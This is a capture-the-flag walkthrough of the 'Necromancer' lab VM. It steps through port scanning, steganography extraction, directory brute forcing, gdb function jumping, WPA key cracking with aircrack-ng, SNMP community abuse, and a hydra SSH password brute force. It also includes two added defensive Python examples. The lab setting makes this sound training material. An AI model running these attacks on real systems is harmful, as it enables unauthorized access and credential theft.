Necromancer Walkthrough

In this post I'll walk through Necromancer, a challenge written by xerubus.

Attack machine: 192.168.56.102  
Target machine: 192.168.56.101  

I used Nmap to check the target machine, but all the ports seem to be filtered.

Starting Nmap 7.01 ( https://nmap.org ) at 2017-06-26 14:48 EDT  
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers  
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan  
SYN Stealth Scan Timing: About 71.50% done; ETC: 14:48 (0:00:06 remaining)  
Stats: 0:00:18 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan  
SYN Stealth Scan Timing: About 83.00% done; ETC: 14:48 (0:00:04 remaining)  
Nmap scan report for 192.168.56.101  
Host is up (0.00026s latency).  
All 1000 scanned ports on 192.168.56.101 are filtered  
MAC Address: 08:00:27:DE:4E:19 (Oracle VirtualBox virtual NIC)  

I tried something else and finally found an open UDP port:

Nmap scan report for 192.168.56.101  
Host is up (0.00040s latency).  
PORT    STATE    SERVICE  
666/tcp filtered doom  
MAC Address: 08:00:27:DE:4E:19 (Oracle VirtualBox virtual NIC)  

Flag 1

Use Netcat to connect to this port:

root@evilc:/home/necromancer# nc -u 192.168.56.101 666  
hello  
You gasp for air! Time is running out!  
test  
You gasp for air! Time is running out!  
wtf?  
You gasp for air! Time is running out!  

That got nothing, so I used tcpdump to check the packets and found something interesting:

15:04:02.743863 IP (tos 0x0, ttl 64, id 54286, offset 0, flags [DF], proto TCP (6), length 64)  
    192.168.56.101.29665 > evilc.4444: Flags [S], cksum 0x6733 (correct), seq 897937792, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 3900868584 ecr 0], length 0
15:04:02.743885 IP (tos 0x0, ttl 64, id 3384, offset 0, flags [DF], proto TCP (6), length 40)  

It seems the target machine is sending packets to port 4444 on the attack machine, so I used Netcat to listen on port 4444:

root@evilc:/home/necromancer# nc -lvnp 4444  
listening on [any] 4444 ...  
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 26124  
...

Decode it to get a message:

Welcome!

You find yourself staring towards the horizon, with nothing but silence surrounding you.  
You look east, then south, then west, all you can see is a great wasteland of nothingness.

Turning to your north you notice a small flicker of light in the distance.  
You walk north towards the flicker of light, only to be stopped by some type of invisible barrier.  

The air around you begins to get thicker, and your heart begins to beat against your chest.  
You turn to your left.. then to your right!  You are trapped!

You fumble through your pockets.. nothing!  
You look down and see you are standing in sand.  
Dropping to your knees you begin to dig frantically.

As you dig you notice the barrier extends underground!  
Frantically you keep digging and digging until your nails suddenly catch on an object.

You dig further and discover a small wooden box.  
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.

You open the box, and find a parchment with the following written on it. "Chant the string of flag1 - u666"  

That gives the first flag, flag1{e6078b9b1aac915d11b9fd59791030bf}. Decoding it gives the string opensesame, and the hint is u666 (UDP port 666).

Flag 2

Try this port again:

root@evilc:/home/necromancer# nc -u 192.168.56.101 666  
opensesame


A loud crack of thunder sounds as you are knocked to your feet!

Dazed, you start to feel fresh air entering your lungs.

You are free!

In front of you written in the sand are the words:

flag2{c39cd4df8f2e35d20d92c2e44de5f7c6}

As you stand to your feet you notice that you can no longer see the flicker of light in the distance.

You turn frantically looking in all directions until suddenly, a murder of crows appear on the horizon.

As they get closer you can see one of the crows is grasping on to an object. As the sun hits the object, shards of light beam from its surface.

The birds get closer, and closer, and closer.

Staring up at the crows you can see they are in a formation.

Squinting your eyes from the light coming from the object, you can see the formation looks like the numeral 80.

As quickly as the birds appeared, they have left you once again.... alone... tortured by the deafening sound of silence.

666 is closed.]  

That gives the second flag. Decoding it gives a number that seems useless, but the text also hints at the number 80, so I need to move to port 80.

Flag 3

There is an image on port 80.
According to the hint, there is some information in this image, so I downloaded it and checked it with binwalk:

root@evilc:/home/necromancer# wget http://192.168.56.101/pics/pileoffeathers.jpg  
--2017-06-26 15:18:38--  http://192.168.56.101/pics/pileoffeathers.jpg
Connecting to 192.168.56.101:80... connected.  
HTTP request sent, awaiting response... 200 OK  
Length: 37289 (36K) [image/jpeg]  
Saving to: ‘pileoffeathers.jpg’

pileoffeathers.jpg            100%[==============================================>]  36.42K  --.-KB/s    in 0.002s  

2017-06-26 15:18:38 (17.8 MB/s) - ‘pileoffeathers.jpg’ saved [37289/37289]

root@evilc:/home/necromancer# binwalk pileoffeathers.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION  
--------------------------------------------------------------------------------
0             0x0             JPEG image data, EXIF standard  
12            0xC             TIFF image data, little-endian offset of first image directory: 8  
270           0x10E           Unix path: /www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http  
36994         0x9082          Zip archive data, at least v2.0 to extract, compressed size: 121, uncompressed size: 125, name: feathers.txt  
37267         0x9193          End of Zip archive  

Extract it to get feathers.txt, which contains flag 3 and a URL.

root@evilc:/home/necromancer# cd _pileoffeathers.jpg.extracted/  
root@evilc:/home/necromancer/_pileoffeathers.jpg.extracted# ls  
9082.zip  feathers.txt  
root@evilc:/home/necromancer/_pileoffeathers.jpg.extracted# cat feathers.txt  
ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2ODEzNzAwMDM5NDYzOWZ9IC0gQ3Jvc3MgdGhlIGNoYXNtIGF0IC9hbWFnaWNicmlkZ2VhcHBlYXJzYXR0aGVjaGFzbQ==  
root@evilc:/home/necromancer/_pileoffeathers.jpg.extracted# cat feathers.txt | base64 -d  
flag3{9ad3f62db7b91c28b68137000394639f} - Cross the chasm at /amagicbridgeappearsatthechasm  
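
The condition binwalk reported above, a ZIP archive appended after the JPEG data, can also be checked programmatically. This is an added example, not part of the original post: the sample bytes and the names build_sample and find_appended_zip are constructed for illustration, and it relies on Python's zipfile module accepting archives that have other data prepended.

```python
import io
import zipfile

ZIP_LOCAL_HEADER = b"PK\x03\x04"   # signature binwalk labels "Zip archive data"
JPEG_SOI = b"\xff\xd8"             # JPEG start-of-image marker
JPEG_EOI = b"\xff\xd9"             # JPEG end-of-image marker


def build_sample():
    """Constructed input: JPEG-shaped bytes with a one-file ZIP appended."""
    image = (JPEG_SOI + b"\xff\xe0\x00\x10JFIF\x00" + bytes(9)
             + b"constructed pixels" + JPEG_EOI)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("note.txt", "constructed payload, not the page's feathers.txt\n")
    return image + buf.getvalue(), len(image)


def find_appended_zip(data):
    """Return (offset, members) for a ZIP hidden in a JPEG, or None.

    offset is where the first ZIP entry starts; members maps each
    archived file name to its decompressed bytes.
    """
    if not data.startswith(JPEG_SOI):
        return None  # only inspect files that claim to be JPEGs
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return None  # no end-of-central-directory record: a plain image
    with zf:
        infos = zf.infolist()
        if not infos or zf.testzip() is not None:
            return None  # empty archive or a member failing its CRC check
        # zipfile corrects header offsets for data prepended to the archive,
        # so the smallest one is the absolute offset of the first entry.
        offset = min(info.header_offset for info in infos)
        if data[offset:offset + 4] != ZIP_LOCAL_HEADER:
            return None
        members = {info.filename: zf.read(info) for info in infos}
    return offset, members


if __name__ == "__main__":
    sample, image_len = build_sample()
    hit = find_appended_zip(sample)
    if hit is None:
        print("no appended archive")
    else:
        offset, members = hit
        print(f"ZIP starts at {offset} (0x{offset:X}); image data is {image_len} bytes")
        for name, body in members.items():
            print(f"  {name}: {len(body)} bytes")
```
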

Flag 4

Check that URL.
Well, it's time to use dirb. After trying lots of directories, I finally got a result... (it took me about 6 hours)

root@evilc:/home/necromancer# dirb http://192.168.56.101/amagicbridgeappearsatthechasm/ /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 

-----------------
DIRB v2.22  
By The Dark Raver  
-----------------

START_TIME: Mon Jun 26 15:31:48 2017  
URL_BASE: http://192.168.56.101/amagicbridgeappearsatthechasm/  
WORDLIST_FILES: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

-----------------

GENERATED WORDS: 87568                                                         

---- Scanning URL: http://192.168.56.101/amagicbridgeappearsatthechasm/ ----
+ http://192.168.56.101/amagicbridgeappearsatthechasm/talisman (CODE:200|SIZE:9676)

That finds a binary file, talisman.
Run it:

root@evilc:/home/necromancer# ./talisman  
You have found a talisman.

The talisman is cold to the touch, and has no words or symbols on it's surface.

Do you want to wear the talisman?  yes

Nothing happens.  

Use gdb to check it:

gdb-peda$ info functions  
All defined functions:

Non-debugging symbols:  
0x080482d0  _init  
0x08048310  printf@plt  
0x08048320  __libc_start_main@plt  
0x08048330  __isoc99_scanf@plt  
0x08048350  _start  
0x08048380  __x86.get_pc_thunk.bx  
0x08048390  deregister_tm_clones  
0x080483c0  register_tm_clones  
0x08048400  __do_global_dtors_aux  
0x08048420  frame_dummy  
0x0804844b  unhide  
0x0804849d  hide  
0x080484f4  myPrintf  
0x08048529  wearTalisman  
0x08048a13  main  
0x08048a37  chantToBreakSpell  
0x08049530  __libc_csu_init  
0x08049590  __libc_csu_fini  
0x08049594  _fini  

There are two interesting functions, "wearTalisman" and "chantToBreakSpell". Set a breakpoint at the wearTalisman function, which must be the "Do you want to wear the talisman?" part.

gdb-peda$ break wearTalisman  
[----------------------------------registers-----------------------------------]
EAX: 0xf7fafdbc --> 0xffffd74c --> 0xffffd887 ("LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc"...)  
EBX: 0x0  
ECX: 0xffffd6b0 --> 0x1  
EDX: 0xffffd6d4 --> 0x0  
ESI: 0x1  
EDI: 0xf7fae000 --> 0x1b3db0  
EBP: 0xffffd688 --> 0xffffd698 --> 0x0  
ESP: 0xffffd684 --> 0xf7fae000 --> 0x1b3db0  
EIP: 0x804852d (<wearTalisman+4>:       sub    esp,0x1b4)  
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)  
[-------------------------------------code-------------------------------------]
   0x8048529 <wearTalisman>:    push   ebp
   0x804852a <wearTalisman+1>:  mov    ebp,esp
   0x804852c <wearTalisman+3>:  push   edi
=> 0x804852d <wearTalisman+4>:  sub    esp,0x1b4
   0x8048533 <wearTalisman+10>: lea    edx,[ebp-0x1ac]
   0x8048539 <wearTalisman+16>: mov    eax,0x0
   0x804853e <wearTalisman+21>: mov    ecx,0x64
   0x8048543 <wearTalisman+26>: mov    edi,edx
[------------------------------------stack-------------------------------------]
0000| 0xffffd684 --> 0xf7fae000 --> 0x1b3db0  
0004| 0xffffd688 --> 0xffffd698 --> 0x0  
0008| 0xffffd68c --> 0x8048a29 (<main+22>:      mov    eax,0x0)  
0012| 0xffffd690 --> 0xf7fae3dc --> 0xf7faf1e0 --> 0x0  
0016| 0xffffd694 --> 0xffffd6b0 --> 0x1  
0020| 0xffffd698 --> 0x0  
0024| 0xffffd69c --> 0xf7e12276 (<__libc_start_main+246>:       add    esp,0x10)  
0028| 0xffffd6a0 --> 0x1  
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x0804852d in wearTalisman ()  
gdb-peda$ jump chantToBreakSpell  
Continuing at 0x8048a3b.  
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
You fall to your knees.. weak and weary.  
Looking up you can see the spell is still protecting the cave entrance.  
The talisman is now almost too hot to touch!  
Turning it over you see words now etched into the surface:  
flag4{ea50536158db50247e110a6c89fcf3d3}  
Chant these words at u31337  
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[Inferior 1 (process 2198) exited normally]
Warning: not running or target is remote  
gdb-peda$  

That gives flag 4 with the hint u31337. Decoding the flag gives the string blackmagic, so connect to port 31337 and chant blackmagic.

Flag 5

root@evilc:/home/necromancer# nc -u 192.168.56.101 31337

Nothing happens.  
blackmagic


As you chant the words, a hissing sound echoes from the ice walls.

The blue aura disappears from the cave entrance.

You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain.

You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.

The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.

Suddenly, you are attacked by a swarm of bats!

You aimlessly thrash at the air in front of you!

The bats continue their relentless attack, until.... silence.

Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.

Looking towards one of the torches, you see something on the cave wall.

You walk closer, and notice a pile of mutilated bats lying on the cave floor.  Above them, a word etched in blood on the wall.

/thenecromancerwillabsorbyoursoul

flag5{0766c36577af58e15545f099a3b15e60}  

It's a flag and a URL. Check the URL.

Flag 6

Checking the URL gives flag 6, with a file to download and the hint u161.

Flag 7

Check the file; it's a bzip2 file, so try to decompress it:

root@evilc:/home/necromancer# bzip2 -d necromancer.out  
bzip2: Can't guess original name for necromancer.out -- using necromancer.out.out  
bzip2: necromancer.out is not a bzip2 file.  
root@evilc:/home/necromancer# file necromancer.out  
necromancer.out: POSIX tar archive (GNU)  
root@evilc:/home/necromancer# tar xvf necromancer.out  
necromancer.cap  

It's a cap file, so I need tools to analyse it.
Wireshark shows it's wireless traffic, so aircrack-ng is a better choice.

Flag 8
                                 Aircrack-ng 1.2 rc4

      [00:00:09] 16100/9822768 keys tested (1802.44 k/s) 

      Time left: 1 hour, 30 minutes, 42 seconds                  0.16%

                           KEY FOUND! [ death2all ]


      Master Key     : 7C F8 5B 00 BC B6 AB ED B0 53 F9 94 2D 4D B7 AC 
                       DB FA 53 6F A9 ED D5 68 79 91 84 7B 7E 6E 0F E7 

      Transient Key  : EB 8E 29 CE 8F 13 71 29 AF FF 04 D7 98 4C 32 3C 
                       56 8E 6D 41 55 DD B7 E4 3C 65 9A 18 0B BE A3 B3 
                       C8 9D 7F EE 13 2D 94 3C 3F B7 27 6B 06 53 EB 92 
                       3B 10 A5 B0 FD 1B 10 D4 24 3C B9 D6 AC 23 D5 7D 

      EAPOL HMAC     : F6 E5 E2 12 67 F7 1D DC 08 2B 17 9C 72 42 71 8E 

The key is death2all.
I don't know what the key is for, so I tried connecting with Netcat, but got nothing. So I looked up port 161: it's the port for SNMP.

root@evilc:/home/necromancer# snmpwalk -c death2all -v1 192.168.56.101  
iso.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door."  
iso.3.6.1.2.1.1.4.0 = STRING: "The door is Locked. If you choose to defeat me, the door must be Unlocked."  
iso.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!"  
iso.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!"  
End of MIB  
root@evilc:/home/necromancer#  

iso.3.6.1.2.1.1.6.0 is locked, and there is a string death2allrw. The first thing I need to do is unlock it. (Here I need to learn more about SNMP, snmpwalk and snmpset.)

root@evilc:/home/necromancer# snmpwalk -c death2all -v1 192.168.56.101  
iso.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door."  
iso.3.6.1.2.1.1.4.0 = STRING: "The door is unlocked! You may now enter the Necromancer's lair!"  
iso.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!"  
iso.3.6.1.2.1.1.6.0 = STRING: "flag7{9e5494108d10bbd5f9e7ae52239546c4} - t22"  
End of MIB  

Flag 8

Decode the flag to get the string "demonslayer" and the hint t22 (TCP 22?).
Try TCP 22:

root@evilc:/home/necromancer# ssh demonslayer@192.168.56.101  
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!  
Someone could be eavesdropping on you right now (man-in-the-middle attack)!  
It is also possible that a host key has just been changed.  
The fingerprint for the ECDSA key sent by the remote host is  
SHA256:sIaywVX5Ba0Qbo/sFM3Gf9cY9SMJpHk2oTZmOHKTtLU.  
Please contact your system administrator.  
Add correct host key in /root/.ssh/known_hosts to get rid of this message.  
Offending ECDSA key in /root/.ssh/known_hosts:2  
  remove with:
  ssh-keygen -f "/root/.ssh/known_hosts" -R 192.168.56.101
ECDSA host key for 192.168.56.101 has changed and you have requested strict checking.  
Host key verification failed.  

Well, I need to brute force it... (damn it...)

root@evilc:/home/necromancer# hydra -l demonslayer -e nsr ssh://192.168.56.101  
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-06-26 16:48:46  
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
[DATA] attacking service ssh on port 22
1 of 1 target completed, 0 valid passwords found  
Hydra (http://www.thc.org/thc-hydra) finished at 2017-06-26 16:48:47  
root@evilc:/home/necromancer# hydra -l demonslayer -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.101  
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-06-26 16:49:29  
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~14008 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.56.101   login: demonslayer   password: 12345678
1 of 1 target successfully completed, 1 valid password found  
Hydra (http://www.thc.org/thc-hydra) finished at 2017-06-26 16:49:33  
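
On the server side, a run like the one above shows up as a burst of failed logins from one source followed by a success. The following is an added example, not part of the original post, that flags this pattern in OpenSSH-style log lines; the log lines are constructed (reusing the page's host name, user and attack machine address; 192.168.56.1 and the user operator are made up), and the threshold and window are assumed values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd log lines (not taken from the page).
_FAIL = ("Jun 26 16:49:3{s} thenecromancer sshd[41{n:02d}]: Failed password "
         "for demonslayer from 192.168.56.102 port 401{n:02d} ssh2")
SAMPLE_LOG = [
    "Jun 26 16:49:20 thenecromancer sshd[3990]: Failed password for operator from 192.168.56.1 port 50122 ssh2",
    "Jun 26 16:49:25 thenecromancer sshd[3990]: Accepted password for operator from 192.168.56.1 port 50122 ssh2",
    *[_FAIL.format(s=n // 2, n=n) for n in range(6)],
    "Jun 26 16:49:33 thenecromancer sshd[4130]: Accepted password for demonslayer from 192.168.56.102 port 40160 ssh2",
]

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60), year=2017):
    """Return findings as (kind, source, user, failures_in_window) tuples.

    kind is "burst" when a source reaches `threshold` failures inside
    `window`, and "success_after_burst" when a login then succeeds from
    that same source while the burst is still inside the window.
    Syslog timestamps carry no year, so one is supplied by the caller.
    """
    recent = defaultdict(deque)  # source address -> recent failure times
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        failures = recent[m["src"]]
        while failures and ts - failures[0] > window:
            failures.popleft()  # forget failures older than the window
        if m["result"] == "Failed":
            failures.append(ts)
            if len(failures) == threshold:
                findings.append(("burst", m["src"], m["user"], len(failures)))
        else:
            if len(failures) >= threshold:
                findings.append(("success_after_burst", m["src"], m["user"], len(failures)))
            failures.clear()  # a successful login resets the counter
    return findings


if __name__ == "__main__":
    for finding in detect_bruteforce(SAMPLE_LOG):
        print(finding)
```
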

Luckily, the password is easy: 12345678.
SSH in:

evilc@evilc:~$ ssh demonslayer@192.168.56.101  
demonslayer@192.168.56.101's password: 

          .                                                      .
        .n                   .                 .                  n.
  .   .dP                  dP                   9b                 9b.    .
 4    qXb         .       dX                     Xb       .        dXp     t
dX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb  
9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP  
 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo.           .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
  `9XXXXXXXXXXXXXXXXXXXXX'~   ~`OOO8b   d8OOO'~   ~`XXXXXXXXXXXXXXXXXXXXXP'
    `9XXXXXXXXXXXP' `9XX'          `98v8P'          `XXP' `9XXXXXXXXXXXP'
        ~~~~~~~       9X.          .db|db.          .XP       ~~~~~~~
                        )b.  .dbo.dP'`v'`9b.odb.  .dX(
                      ,dXXXXXXXXXXXb     dXXXXXXXXXXXb.
                     dXXXXXXXXXXXP'   .   `9XXXXXXXXXXXb
                    dXXXXXXXXXXXXb   d|b   dXXXXXXXXXXXXb
                    9XXb'   `XXXXXb.dX|Xb.dXXXXX'   `dXXP
                     `'      9XXXXXX(   )XXXXXXP      `'
                              XXXX X.`v'.X XXXX
                              XP^X'`b   d'`X^XX
                              X. 9  `   '  P )X
                              `b  `       '  d'
                               `             '                       
                               THE NECROMANCER!
                                 by  @xerubus

$ id
uid=1000(demonslayer) gid=1000(demonslayer) groups=1000(demonslayer)  
$ ls
flag8.txt  
$ cat flag8.txt                                                                                                     
You enter the Necromancer's Lair!

A stench of decay fills this place.  

Jars filled with parts of creatures litter the bookshelves.

A fire with flames of green burns coldly in the distance.

Standing in the middle of the room with his back to you is the Necromancer.  

In front of him lies a corpse, indistinguishable from any living creature you have seen before.

He holds a staff in one hand, and the flickering object in the other.

"You are a fool to follow me here!  Do you not know who I am!"

The necromancer turns to face you.  Dark words fill the air!

"You are damned already my friend.  Now prepare for your own death!" 

Defend yourself!  Counter attack the Necromancer's spells at u777!  

I tried to connect to port 777 from the attack machine but failed, so I tried connecting from localhost:

$ nc -u localhost 777
hello


** You only have 2 hitpoints left! **

Defend yourself from the Necromancer's Spells!

Where do the Black Robes practice magic of the Greater Path?  

Google it:
The answer is Kelewan.

$ nc -u localhost 777
hello


** You only have 2 hitpoints left! **

Defend yourself from the Necromancer's Spells!

Where do the Black Robes practice magic of the Greater Path?  Kelewan


flag8{55a6af2ca3fee9f2fef81d20743bda2c}  

Flag 9

Google it and check the next answer:

Defend yourself from the Necromancer's Spells!

Who did Johann Faust VIII make a deal with?  Mephistopheles


flag9{713587e17e796209d1df4c9c2c2d2966}  

Flag 10

Another question; Google it:

Defend yourself from the Necromancer's Spells!

Who is tricked into passing the Ninth Gate?  Hedge


flag10{8dc6486d2c63cafcdc6efbba2be98ee4}

A great flash of light knocks you to the ground; momentarily blinding you!

As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.

An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.

The room is silent.

You walk over to where the Necromancer once stood.

On the ground is a small vile.  

So there is a vile. Check the directory:

$ ls -la
total 44  
drwxr-xr-x  3 demonslayer  demonslayer  512 Jun 27 03:17 .  
drwxr-xr-x  3 root         wheel        512 May 11  2016 ..  
-rw-r--r--  1 demonslayer  demonslayer   87 May 11  2016 .Xdefaults
-rw-r--r--  1 demonslayer  demonslayer  773 May 11  2016 .cshrc
-rw-r--r--  1 demonslayer  demonslayer  103 May 11  2016 .cvsrc
-rw-r--r--  1 demonslayer  demonslayer  359 May 11  2016 .login
-rw-r--r--  1 demonslayer  demonslayer  175 May 11  2016 .mailrc
-rw-r--r--  1 demonslayer  demonslayer  218 May 11  2016 .profile
-rw-r--r--  1 demonslayer  demonslayer  196 Jun 27 03:13 .smallvile
drwx------  2 demonslayer  demonslayer  512 May 11  2016 .ssh  
-rw-r--r--  1 demonslayer  demonslayer  706 May 11  2016 flag8.txt
$ cat .smallvile                                                                                                    


You pick up the small vile.

Inside of it you can see a green liquid.

Opening the vile releases a pleasant odour into the air.

You drink the elixir and feel a great power within your veins!  

Flag 11

Before I checked the .smallvile file, I had no privilege to run sudo -l, but after I checked the .smallvile file, I could execute sudo -l:

$ sudo -l
Matching Defaults entries for demonslayer on thenecromancer:  
    env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK"

User demonslayer may run the following commands on thenecromancer:  
    (ALL) NOPASSWD: /bin/cat /root/flag11.txt

Well

$ sudo /bin/cat /root/flag11.txt



Suddenly you feel dizzy and fall to the ground!

As you open your eyes you find yourself staring at a computer screen.

Congratulations!!! You have conquered......

          .                                                      .
        .n                   .                 .                  n.
  .   .dP                  dP                   9b                 9b.    .
 4    qXb         .       dX                     Xb       .        dXp     t
dX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb  
9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP  
 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo.           .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
  `9XXXXXXXXXXXXXXXXXXXXX'~   ~`OOO8b   d8OOO'~   ~`XXXXXXXXXXXXXXXXXXXXXP'
    `9XXXXXXXXXXXP' `9XX'          `98v8P'          `XXP' `9XXXXXXXXXXXP'
        ~~~~~~~       9X.          .db|db.          .XP       ~~~~~~~
                        )b.  .dbo.dP'`v'`9b.odb.  .dX(
                      ,dXXXXXXXXXXXb     dXXXXXXXXXXXb.
                     dXXXXXXXXXXXP'   .   `9XXXXXXXXXXXb
                    dXXXXXXXXXXXXb   d|b   dXXXXXXXXXXXXb
                    9XXb'   `XXXXXb.dX|Xb.dXXXXX'   `dXXP
                     `'      9XXXXXX(   )XXXXXXP      `'
                              XXXX X.`v'.X XXXX
                              XP^X'`b   d'`X^XX
                              X. 9  `   '  P )X
                              `b  `       '  d'
                               `             '                       
                               THE NECROMANCER!
                                 by  @xerubus

                   flag11{42c35828545b926e79a36493938ab1b1}


Big shout out to Dook and Bull for being test bunnies.

Cheers OJ for the obfuscation help.

Thanks to SecTalks Brisbane and their sponsors for making these CTF challenges possible.

"========================================="
"  xerubus (@xerubus) - www.mogozobo.com  "
"========================================="

Decode flag11.
Finally done. Amazing.